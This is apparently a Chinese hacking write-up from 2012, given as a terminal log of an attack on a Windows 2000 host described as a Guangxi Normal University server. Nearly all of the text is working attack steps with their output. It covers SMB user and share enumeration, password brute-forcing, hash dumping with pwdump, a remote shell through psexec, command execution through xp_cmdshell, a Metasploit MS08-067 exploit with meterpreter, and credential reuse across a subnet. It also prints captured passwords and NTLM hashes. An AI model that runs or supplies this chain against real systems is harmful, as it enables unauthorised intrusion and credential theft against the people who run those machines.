Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // obtain a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the MS08-067 vulnerability against the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple msf + nmap attack.